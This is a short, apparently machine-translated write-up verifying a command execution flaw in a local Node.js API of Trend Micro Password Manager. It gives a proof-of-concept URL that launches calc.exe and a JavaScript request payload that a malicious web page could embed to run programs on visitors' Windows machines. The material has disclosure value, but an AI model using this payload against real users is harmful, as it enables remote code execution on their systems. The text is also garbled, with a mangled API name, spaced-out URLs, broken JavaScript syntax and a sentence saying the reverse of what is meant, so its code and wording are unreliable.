Trend Micro Password Manager arbitrary command execution vulnerability Verification

Trend Micro Password Manager arbitrary command execution vulnerability Verification

The Trend Micro Anti-Virus Software Package for windows contains a password management program, which also provides a separate download connection on the official website. It is a free service. Install the latest TRAND Micro by default:

Figure 1

You can find this password management program in data security, which is enabled by default. You can see that the local port listening is performed:

Figure 2

The listening port is 49153, and the google analysis shows 49155. It seems that this port is within a range. This service is an http server program developed by node. js. There is a arbitrary command execution vulnerability in this url:

Https: // localhost: 49153/api/openurlindefabrowser browser? Url = cmd

This api is used to open a page in a browser:

Figure 3

However, you can also open the system path:

Figure 4

You can then open the file in the path:

Figure 5

In the end, even executable files are useless, which is really powerful:

Https: // localhost: 49153/api/openurlindefabrowser browser? Url = c:/windows/system32/calc.exe

Figure 6

The hazard of this vulnerability is that as long as an attacker inserts a request like this on the page:

1 x = new XMLHttpRequest () 1 x. open ("GET", "https: // localhost: 49153/api/openurlindefabrowser browser? Url = c:/windows/system32/calc.exe true ); 1 try {x. send () ;}catch (e ){};

You can execute any command on the windows system where TrendMicro is installed.